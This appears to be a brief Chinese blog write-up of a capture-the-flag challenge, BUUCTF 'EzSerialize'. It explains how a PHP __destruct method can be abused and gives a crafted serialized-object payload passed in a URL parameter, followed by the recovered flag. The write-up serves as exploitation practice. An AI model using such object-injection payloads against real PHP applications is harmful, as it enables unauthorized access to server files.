【BUUCTF】EzSerialize
源码
1 |
|
分析
1 | public function __destruct(){ |
__destruct()
方法在函数销毁时触发,如果此时的 $key
是 'yes'
的时候,读取 flag.php
并返回
payload
- 类的序列化字符串:
O:4:"flag":1:{}
- 公有属性的序列化字符串:
s:3:"key";
yes
的序列化结果:s:3:"yes";
故payload:?ctf=O:4:"flag":1:{s:3:"key";s:3:"yes";}
得到:flag{b2793e68e357be0626ca8d62233c8199}
- 标题: 【BUUCTF】EzSerialize
- 作者: Itachi
- 创建于 : 2021-11-30 02:06:28
- 更新于 : 2021-11-30 03:21:56
- 链接: https://blog.tarchi.top/ctf/【BUUCTF】EzSerialize/
- 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
评论